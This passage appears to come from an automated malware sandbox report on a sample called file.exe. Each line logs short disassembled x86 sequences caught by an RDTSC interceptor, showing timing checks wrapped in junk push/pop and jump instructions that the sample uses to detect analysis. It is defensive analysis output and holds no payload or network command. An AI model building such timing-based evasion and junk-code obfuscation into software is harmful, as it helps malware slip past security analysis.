          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E17D second address: 61E183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E2A7 second address: 61E2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E2AB second address: 61E2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F37B45370A5h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F37B45370A3h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E2DB second address: 61E312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F37B4535CDEh 0x0000000c jmp 00007F37B4535CE0h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 ja 00007F37B4535CD6h 0x0000001b jc 00007F37B4535CD6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E312 second address: 61E31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F37B45370A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E31F second address: 61E32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F37B4535CD6h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA61 second address: 61EA80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F37B4537096h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F37B4537096h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA80 second address: 61EA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA84 second address: 61EA8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA8A second address: 61EAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F37B4535CE0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EAA3 second address: 61EAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D055 second address: 61D05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D05B second address: 61D08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F37B4537098h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jnl 00007F37B4537096h 0x00000015 jns 00007F37B4537096h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F37B45370A0h 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624ED6 second address: 624EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62493E second address: 624944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624C4C second address: 624C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56797A second address: 567986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F37B4537096h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567986 second address: 56799B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F37B4535CDCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56799B second address: 5679B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B45370A6h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5679B5 second address: 5679CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F37B4535CDBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5679CC second address: 5679D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5679D0 second address: 567A00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F37B4535CDDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F37B4535CD6h 0x00000013 jmp 00007F37B4535CE5h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633B00 second address: 633B0A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633C6D second address: 633C7D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F37B4535CD6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633C7D second address: 633C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AEBE second address: 63AECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F37B4535CDCh 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C518 second address: 63C542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Fh 0x00000007 jmp 00007F37B45370A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C542 second address: 63C548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643A58 second address: 643A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646CFA second address: 646D1B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F37B4535CE5h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646D1B second address: 646D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646D1F second address: 646D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646D2B second address: 646D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646BB3 second address: 646BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D0CC second address: 64D0D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BB48 second address: 64BB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1BB second address: 64C1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F37B4537096h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1C7 second address: 64C1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F37B4535CDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1DC second address: 64C1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1E0 second address: 64C1E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C39E second address: 64C3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CDBD second address: 64CDCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CDCB second address: 64CDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F37B453709Fh 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CDDF second address: 64CDFD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F37B4535CE7h 0x00000008 pop ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651532 second address: 65153C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F37B45370ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6516E1 second address: 6516E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6516E5 second address: 6516EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6611B5 second address: 6611C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F37B4535CD6h 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6611C0 second address: 6611D4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F37B453709Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6611D4 second address: 6611D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6714ED second address: 6714F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6714F1 second address: 671500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671500 second address: 671508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671508 second address: 67150C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67150C second address: 67151A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67151A second address: 67151E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67151E second address: 671528 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F37B4537096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671057 second address: 671068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jl 00007F37B4535CD6h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671068 second address: 671094 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F37B45370A5h 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671094 second address: 671099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671099 second address: 6710AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F37B453709Dh 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68720B second address: 687222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D2D4 second address: 68D2F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F37B453709Ch 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68ED74 second address: 68ED78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68ED78 second address: 68ED84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F37B4537096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB03E second address: 5AB057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CE5h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB057 second address: 5AB06E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F37B45370A0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB238 second address: 5AB23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB23C second address: 5AB246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0345 second address: 4CF0362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 36D3A4EFh 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F37B4535CDAh 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0362 second address: 4CF03A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F37B453709Bh 0x00000014 xor esi, 78882BDEh 0x0000001a jmp 00007F37B45370A9h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03A5 second address: 4CF03B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CDAh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03B3 second address: 4CF03D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 popad 0x00000013 mov ecx, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03D5 second address: 4CF03D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03D9 second address: 4CF03DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03DF second address: 4CF03E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03E5 second address: 4CF03E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF03E9 second address: 4CF03ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0402 second address: 4CF0408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0408 second address: 4CF040C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF040C second address: 4CF0410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10629 second address: 4D1062E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1062E second address: 4D10692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F37B453709Fh 0x0000000f pushfd 0x00000010 jmp 00007F37B45370A8h 0x00000015 adc esi, 62E79FC8h 0x0000001b jmp 00007F37B453709Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F37B45370A6h 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10692 second address: 4D10698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10698 second address: 4D1069E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1069E second address: 4D106A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D106A2 second address: 4D106CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F37B45370A0h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D106CF second address: 4D106D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D106D4 second address: 4D1070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d mov si, 0AD7h 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F37B45370A9h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1070C second address: 4D10765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F37B4535CE1h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 pushad 0x00000016 call 00007F37B4535CE4h 0x0000001b pop eax 0x0000001c jmp 00007F37B4535CDBh 0x00000021 popad 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-04h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10765 second address: 4D10780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10780 second address: 4D107BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F37B4535CE8h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D107BA second address: 4D107C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D107C9 second address: 4D10808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F37B4535CE1h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F37B4535CDDh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10808 second address: 4D1082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F37B453709Dh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10911 second address: 4D10917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10917 second address: 4D1093C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F37B45370A8h 0x00000012 rdtsc
